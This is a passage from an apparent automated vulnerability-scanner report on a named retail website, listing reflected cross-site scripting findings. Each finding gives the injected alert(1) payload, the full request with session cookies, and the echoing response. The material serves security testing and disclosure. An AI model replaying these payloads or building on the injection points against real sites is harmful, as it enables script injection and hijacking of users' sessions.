Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:18:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=28opuu1bvek2saq3nnrtc74pk1; expires=Tue, 09-Nov-2010 17:18:50 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/checkout/carte3f96"-alert(1)-"360bb29e453/");
//]]>
...[SNIP]...

1.35. http://www.fredperry.com/checkout/cart/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /checkout/cart/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aaeb2"-alert(1)-"48ab0bad009 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /checkout/cart/?aaeb2"-alert(1)-"48ab0bad009=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:17:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=5nisihs029stoa57940hda3sn4; expires=Tue, 09-Nov-2010 17:17:52 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Fred Per
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/checkout/cart/?aaeb2"-alert(1)-"48ab0bad009=1");
//]]>
...[SNIP]...

1.36. http://www.fredperry.com/contacts/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /contacts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd4e5"-alert(1)-"2ac73757ecd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /contactsbd4e5"-alert(1)-"2ac73757ecd/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:18:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=jh0vo27j1jvpb68t8sdl5qirv6; expires=Tue, 09-Nov-2010 17:18:10 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/contactsbd4e5"-alert(1)-"2ac73757ecd/");
//]]>
...[SNIP]...

1.37. http://www.fredperry.com/contacts/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /contacts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 464b0"-alert(1)-"4c1edb0da7a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /contacts/?464b0"-alert(1)-"4c1edb0da7a=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:17:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ne26v2iejs3kmhqd2l93g608e1; expires=Tue, 09-Nov-2010 17:17:38 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Fred Per
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/contacts/?464b0"-alert(1)-"4c1edb0da7a=1");
//]]>
...[SNIP]...

1.38. http://www.fredperry.com/customercare/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41986"-alert(1)-"bad21956557 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare41986"-alert(1)-"bad21956557/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:16:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=34gef0dea5ctpbtgku4qtilqc2; expires=Tue, 09-Nov-2010 17:16:52 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare41986"-alert(1)-"bad21956557/");
//]]>
...[SNIP]...

1.39. http://www.fredperry.com/customercare/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 900a1"-alert(1)-"6e32b2c374e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare/?900a1"-alert(1)-"6e32b2c374e=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:16:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=75qs3uusvp70t54vc3kcgds952; expires=Tue, 09-Nov-2010 17:16:17 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31793

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Custome
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare/?900a1"-alert(1)-"6e32b2c374e=1");
//]]>
...[SNIP]...

1.40. http://www.fredperry.com/customercare/delivery/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/delivery/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75a54"-alert(1)-"6789d05419e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare75a54"-alert(1)-"6789d05419e/delivery/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:17:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=34tn4624mcd4thnbsvokvo7nf0; expires=Tue, 09-Nov-2010 17:17:00 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29357

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare75a54"-alert(1)-"6789d05419e/delivery/");
//]]>
...[SNIP]...

1.41. http://www.fredperry.com/customercare/delivery/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/delivery/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3eacb"-alert(1)-"257fda257ac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare/delivery3eacb"-alert(1)-"257fda257ac/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:17:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=41nrhbjdpjk7dkmn0nohfukmf3; expires=Tue, 09-Nov-2010 17:17:20 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29357

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare/delivery3eacb"-alert(1)-"257fda257ac/");
//]]>
...[SNIP]...

1.42. http://www.fredperry.com/customercare/delivery/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/delivery/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd5f1"-alert(1)-"ada1d66d6a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare/delivery/?dd5f1"-alert(1)-"ada1d66d6a4=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:16:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=j247u2arg3uide75hgajfi3le2; expires=Tue, 09-Nov-2010 17:16:12 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Deliver
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare/delivery/?dd5f1"-alert(1)-"ada1d66d6a4=1");
//]]>
...[SNIP]...

1.43. http://www.fredperry.com/customercare/deliverylate/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/deliverylate/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c11fc"-alert(1)-"e04e37a7eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercarec11fc"-alert(1)-"e04e37a7eb/deliverylate/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:17:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=l4erk5aec401u2f60cqm0060o6; expires=Tue, 09-Nov-2010 17:17:13 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercarec11fc"-alert(1)-"e04e37a7eb/deliverylate/");
//]]>
...[SNIP]...

1.44. http://www.fredperry.com/customercare/deliverylate/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/deliverylate/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3ddd"-alert(1)-"ca7404da0f0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare/deliverylatee3ddd"-alert(1)-"ca7404da0f0/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:17:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=m3t49fuevbtdncf9jjst5c8de7; expires=Tue, 09-Nov-2010 17:17:38 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare/deliverylatee3ddd"-alert(1)-"ca7404da0f0/");
//]]>
...[SNIP]...

1.45. http://www.fredperry.com/customercare/deliverylate/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/deliverylate/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95c50"-alert(1)-"6baf5d54777 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare/deliverylate/?95c50"-alert(1)-"6baf5d54777=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:16:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=sfs2d8bi9ii4tkdsp5it7l2l11; expires=Tue, 09-Nov-2010 17:16:45 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33163

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Late De
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare/deliverylate/?95c50"-alert(1)-"6baf5d54777=1");
//]]>
...[SNIP]...

1.46. http://www.fredperry.com/customercare/faq/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/faq/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dae5a"-alert(1)-"40f1ed9aa59 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercaredae5a"-alert(1)-"40f1ed9aa59/faq/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:21:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=jdmst23utqklf1vmkl2k49ph12; expires=Tue, 09-Nov-2010 17:21:08 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercaredae5a"-alert(1)-"40f1ed9aa59/faq/");
//]]>
...[SNIP]...

1.47. http://www.fredperry.com/customercare/faq/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/faq/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e6e4"-alert(1)-"7c11dc98e25 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare/faq5e6e4"-alert(1)-"7c11dc98e25/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:21:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=9l0k5hcfbprm6okg0o12cfko46; expires=Tue, 09-Nov-2010 17:21:38 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare/faq5e6e4"-alert(1)-"7c11dc98e25/");
//]]>
...[SNIP]...

1.48. http://www.fredperry.com/customercare/faq/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
